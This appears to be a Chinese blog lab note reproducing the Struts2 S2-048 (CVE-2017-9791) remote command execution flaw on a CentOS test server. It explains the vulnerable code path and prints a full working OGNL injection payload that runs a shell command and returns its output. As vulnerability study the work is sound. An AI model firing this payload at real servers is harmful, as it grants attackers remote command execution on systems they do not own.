入坑centos笔记(二)

搭建centos服务器环境事实上是为了复现CVE-2017-9791  Struts(S2-048远程命令执行漏洞)

一、   漏洞分析

原理:在Struts2.3.x 系列的Showcase应用中演示Struts2整合Struts1的插件中存在一处任意代码执行漏洞。当应用使用了Struts2 Struts1的插件时,可能导致不受信任的输入传入到ActionMessage类中导致命令执行。

具体分析(以struts2.3.24版本为例):

漏洞触发位置在SaveGangsterAction.java中,

在struts2中开启了struts1的插件,org.apache.struts2.s1.Struts1Action类是把封装了struts1的Action 以便兼容在struts2中。

首先这里ActionForwardforward = action.execute(mapping, actionForm, request, response);会把表单的请求处理回显给客户端。

然后addActionMessage(getText(msg.getKey(),Arrays.asList(msg.getValues())));这里又调用了getText方法会把action messages传递给com.opensymphony.xwork2.util.LocalizedTextUtil.getDefaultMessage。

最后在其中又调用了com.opensymphony.xwork2.util.TextParseUtil.translateVariables,它用来调用OGNL 表达式用处理字符串表达式。漏洞利用OGNL表达式执行任意命令。


二、   实验环境

1.  靶机:centOS 7.3 :https://www.centos.org/download/

2.  攻击机: Windows10 64-bit

 

三、   实验结果

//实验操作的完整步骤

首先搭建实验环境,这里使用的靶机环境为centOS 7.3 64-bit

 

在对应网站下载受影响的struts2版本具体影响范围为struts2.3.*

这里使用了struts2.3.24进行漏洞复现

将struts2-showcase.war放到tomcat/webapps目录下,首先进行本地测试服务是否完好

服务器靶机:curl 127.0.0.1:8080\

发现有response说明服务完好。查询本机ip地址为192.168.36.128

那么在攻击机上进行基本访问

这里UA使用firefox,url:http://192.168.36.128:8080/struts2-showcase/integration/editGangster.action

 

 

验证漏洞:在Gangster Name中提交${1+1}发现最终1+1被执行

说明漏洞存在

于是构造payload:name=${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd="ifconfig").(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=newjava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}&age=111&__checkbox_bustedBefore=true&description=

其中加粗的地方为可执行的命令

这里面遇到一个坑,调了很久不知道哪里出了问题。。就是我在直接提交payload的时候发现返回name字段不能为空,加一个回车换行就可以,具体在验证脚本中有写到。

Burpsuite抓包修改重放可以看到

成功执行了ifconfig命令

于是写脚本验证,脚本主体如下:

由于需要换行(最后还是不知道为什么)于是在蓝色箭头处手动添加换行符。

 

 

执行脚本

服务器端信息:

至此、漏洞验证过程完毕

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux是一种开源的操作系统内核,而CentOS则是一种基于Linux内核的发行版。下面是关于Linux和CentOS的一些笔记: 1. Linux操作系统: - Linux是一种开源操作系统内核,最初由Linus Torvalds于1991年创建。 - Linux操作系统具有高度的可定制性和灵活性,适用于各种设备,包括个人电脑、服务器、嵌入式系统等。 - Linux支持多用户、多任务和多线程,并提供了丰富的命令行工具和图形界面。 - 常见的Linux发行版包括Ubuntu、Debian、Fedora、CentOS等。 2. CentOS发行版: - CentOS是一种基于Red Hat Enterprise Linux(RHEL)源代码构建的免费发行版。 - CentOS提供了稳定、可靠且安全的操作系统环境,适用于服务器和企业级应用。 - CentOS与RHEL在软件包和功能方面基本保持一致,但不包含商业支持。 - CentOS使用yum作为软件包管理工具,可以方便地安装、更新和卸载软件包。 3. 常用命令和配置: - 在Linux和CentOS中,常用的命令有ls(列出文件和目录)、cd(切换目录)、mkdir(创建目录)、rm(删除文件或目录)等。 - 配置文件通常存放在/etc目录下,例如/etc/network/interfaces用于配置网络接口。 - Linux和CentOS支持使用vi或nano等文本编辑器来编辑配置文件。 - 通过使用sudo命令,可以以超级用户权限执行特权操作。 这些是关于Linux和CentOS的一些基本笔记。如果你有更具体的问题,我可以为你提供更详细的信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值